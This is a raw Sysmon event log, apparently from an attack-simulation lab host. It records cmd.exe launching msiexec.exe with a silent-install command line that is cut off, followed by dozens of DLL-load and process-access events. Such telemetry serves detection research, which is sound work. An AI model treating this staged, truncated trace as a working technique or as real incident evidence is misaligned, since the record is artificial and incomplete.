15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694731Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002694729Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688\wkssvcc:\windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694728Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694727Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694726Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694725Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694724Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694723Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694722Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694721Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694720Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694719Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694718Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694717Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694716Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694715Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694714Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694713Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694712Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694711Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694710Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694709Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694708Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.162{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694707Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694706Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694705Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694704Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694703Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694702Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694701Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694700Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694699Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694698Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694697Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694696Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694695Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694694Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694693Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694692Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694691Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694690Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694689Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694688Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694687Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694685Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694684Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.147{7CF983DC-9826-62AC-2E6B-000000006202}18283900C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694683Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.150{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /q /i 